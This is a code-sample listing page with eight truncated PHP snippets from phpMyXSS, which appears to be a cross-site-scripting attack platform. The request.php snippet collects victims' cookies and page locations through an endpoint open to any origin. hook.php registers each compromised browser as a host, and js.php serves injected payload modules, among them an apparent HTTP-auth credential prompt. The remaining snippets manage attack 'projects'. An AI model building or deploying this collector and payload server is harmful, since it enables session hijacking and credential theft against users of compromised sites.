PHP pmxProjectの例

コード例 #1

ファイル: hook.php プロジェクト: mtpkiss/phpMyXSS

$current_url = get_url();
$URI = substr($current_url, strlen(PMX_SITEURL), strlen($current_url) - strlen(PMX_SITEURL));
$uri = explode('/', $URI);
$saltid = substr($uri[2], 0, 8);
// 项目字符串ID
if (count($uri) < 4) {
    header('Content-Type: text/javascript; charset=utf-8');
    die("/*null*/");
}
if (strlen($uri[3]) != 50) {
    header('Content-Type: text/javascript; charset=utf-8');
    die("/*null*/");
}
$sid = $uri[3];
// XSS漏洞页字符串ID
$pmxProj = new pmxProject();
$pmxHost = new pmxHost();
if ($pmxProj->isExistSaltID($saltid) == FALSE) {
    header('Content-Type: text/javascript; charset=utf-8');
    die("/*null*/");
}
$pid = $pmxProj->getIDbySlatID($saltid);
/**
 * 判断是否第一次上线
 */
if ($pmxHost->isExistSaltID($sid) == FALSE) {
    $pmxHost->addHost($pid, $sid);
    // 添加主机
} else {
    $pmxHost->updateHost($sid);
    // 更新主机信息

コード例 #2

ファイル: request.php プロジェクト: mtpkiss/phpMyXSS

<?php

/** Prevent user from loading inc. file */
define("PMX_ENTRANCE", true);
require dirname(__FILE__) . '/public-init.php';
header("Access-Control-Allow-Origin:*");
header('Content-Type: text/json; charset=utf-8');
$current_url = get_url();
$URI = substr($current_url, strlen(PMX_SITEURL), strlen($current_url) - strlen(PMX_SITEURL));
$uri = explode('/', $URI);
$saltid = substr($uri[2], 0, 8);
$pmxProj = new pmxProject();
if ($pmxProj->isExistSaltID($saltid) == FALSE) {
    exit;
}
$id = $pmxProj->getIDbySlatID($saltid);
$detail = $pmxProj->getDetail($id);
if ($detail['status'] == 0) {
    exit;
}
$request_data = isset($_REQUEST) ? $_REQUEST : array();
$location = isset($_REQUEST["location"]) ? $_REQUEST["location"] : "";
$toplocation = isset($_REQUEST["toplocation"]) ? $_REQUEST["toplocation"] : "";
$cookies = isset($_REQUEST["cookies"]) ? $_REQUEST["cookies"] : "";
if (isset($request_data["location"])) {
    unset($request_data["location"]);
}
if (isset($request_data["toplocation"])) {
    unset($request_data["toplocation"]);
}
if (isset($request_data["cookies"])) {

コード例 #3

ファイル: add-project.php プロジェクト: mtpkiss/phpMyXSS

                }
            } else {
                if (isset($_POST["mod_" . $modid_item . "_" . $var])) {
                    $val = $_POST["mod_" . $modid_item . "_" . $var];
                    $modconfig[] = array($modid_item, $var, $val);
                }
            }
        }
    }
}
/**
 * 校验输入信息是否完整和正确
 */
if ($title == "" || !in_array($status, $allow_optionStatus) || !in_array($protect, $allow_optionProtect) || !in_array($mailAlert, $allow_optionMail)) {
    die("Error: Something you input is invalid.");
}
$pmxProj = new pmxProject($title, $desc, $status, $protect, $mailAlert, $mail, $comments, $modid, $modconfig);
/**
 * 项目名是否重复
 */
if ($pmxProj->isExistName($title) == TRUE) {
    die("Error: Duplicate project name.");
}
/**
 * 添加项目
 */
if ($pmxProj->addProj() == TRUE) {
    echo "Success: You have added project \"" . esc_html($title) . "\" successful";
} else {
    echo "Error: Sorry. We are fail to add the project \"" . esc_html($title) . "\".";
}

コード例 #4

ファイル: start-project.php プロジェクト: mtpkiss/phpMyXSS

<?php

/**
 * 启动项目
 */
if (!defined("PMX_ENTRANCE")) {
    header("HTTP/1.0 404 Not Found");
    exit;
}
header('Content-Type: text/html; charset=utf-8');
if (!pmx_validate_token()) {
    die("Error: Token is incorrect.");
}
$id = isset($_GET["id"]) ? intval($_GET["id"]) : NULL;
$pmxProj = new pmxProject();
if (!$pmxProj->isExistID($id)) {
    die("Error: The project id is non-existent.");
}
if ($pmxProj->startProj($id)) {
    echo "Success: You have started the project {$id} successful.";
}

コード例 #5

ファイル: edit-project.php プロジェクト: mtpkiss/phpMyXSS

<?php

if (!defined("PMX_ENTRANCE")) {
    header("HTTP/1.0 404 Not Found");
    exit;
}
pmx_require_header("Edit Project");
pmx_require_nav("");
$id = isset($_GET["id"]) ? intval($_GET["id"]) : NULL;
$pmxProj = new pmxProject();
if (!$pmxProj->isExistID($id)) {
    die("Error: The Project id is non-existent.");
}
$data = $pmxProj->getDetail($id);
$modids = json_decode($data['mods'], true);
?>
<div class="main">
	<div class="main-item-single main-item-add-proj pull-left">
		<form class="form-horizontal" id="form-add-proj"
			action="<?php 
echo pmx_getactionurl_saveproj();
?>
" method="POST"
			role="form">
			<div
				class="main-item-single-left main-item-single-addproj-setting  pull-left">
				<div class="add-proj-item add-proj-item-1">
					<div class="form-group">
						<label for="inputTitle" class="col-sm-2 control-label">Title</label>
						<div class="col-sm-9">
							<input type="text" name="title" class="form-control"

コード例 #6

ファイル: js.php プロジェクト: ambulong/phpMyXSS

<?php

/** Prevent user from loading inc. file */
define("PMX_ENTRANCE", true);
require dirname(__FILE__) . '/public-init.php';
$current_url = get_url();
$URI = substr($current_url, strlen(PMX_SITEURL), strlen($current_url) - strlen(PMX_SITEURL));
if (substr($URI, 0, 1) !== '/') {
    $URI = '/' . $URI;
}
$uri = explode('/', $URI);
$saltid = substr($uri[2], 0, 8);
$pmxProj = new pmxProject();
if ($pmxProj->isExistSaltID($saltid) == FALSE) {
    header('Content-Type: text/javascript; charset=utf-8');
    die("/*null*/");
}
$id = $pmxProj->getIDbySlatID($saltid);
$detail = $pmxProj->getDetail($id);
$mods = json_decode($detail['mods'], true);
if ($detail['status'] == 0) {
    header('Content-Type: text/javascript; charset=utf-8');
    die("/*null*/");
}
$code = $pmxProj->getCode($id);
if (count($mods) == 1 && strpos($code, "{pmx.system.module.")) {
    // 判断是否为系统模块
    $mod_httpauth_id = 34;
    $mod_srcredirection_id = 31;
    $mod_config = $pmxProj->getConfig($id);
    if (strpos($code, "{pmx.system.module.httpauth}")) {

コード例 #7

ファイル: save-project.php プロジェクト: mtpkiss/phpMyXSS

    foreach ($modid as $modid_item) {
        if (isset($_POST["mod_" . $modid_item])) {
            $var = $_POST["mod_" . $modid_item];
            if (is_array($var)) {
                foreach ($var as $var_item) {
                    if (isset($_POST["mod_" . $modid_item . "_" . $var_item])) {
                        $val = $_POST["mod_" . $modid_item . "_" . $var_item];
                        $modconfig[] = array($modid_item, $var_item, $val);
                    }
                }
            } else {
                if (isset($_POST["mod_" . $modid_item . "_" . $var])) {
                    $val = $_POST["mod_" . $modid_item . "_" . $var];
                    $modconfig[] = array($modid_item, $var, $val);
                }
            }
        }
    }
}
if ($id == "" || $title == "" || !in_array($status, $allow_optionStatus) || !in_array($protect, $allow_optionProtect) || !in_array($mailAlert, $allow_optionMail)) {
    die("Error: Something you input is invalid.");
}
$pmxProj = new pmxProject($title, $desc, $status, $protect, $mailAlert, $mail, $comments, $modid, $modconfig);
if ($pmxProj->isExistID($id) == FALSE) {
    die("Error: Project id is invalid.");
}
if ($pmxProj->updateProj($id) == TRUE) {
    echo "Success: You have updated project \"" . esc_html($title) . "\" successful";
} else {
    echo "Error: Sorry. We are fail to update the project \"" . esc_html($title) . "\".";
}

コード例 #8

ファイル: delete-project.php プロジェクト: mtpkiss/phpMyXSS

<?php

/**
 * 删除项目
 */
if (!defined("PMX_ENTRANCE")) {
    header("HTTP/1.0 404 Not Found");
    exit;
}
header('Content-Type: text/html; charset=utf-8');
if (!pmx_validate_token()) {
    die("Error: Token is incorrect.");
}
$id = isset($_GET["id"]) ? intval($_GET["id"]) : NULL;
$pmxProj = new pmxProject();
if (!$pmxProj->isExistID($id)) {
    die("Error: The project id is non-existent.");
}
if ($pmxProj->delProj($id)) {
    echo "Success: You have deleted the project {$id} successful.";
}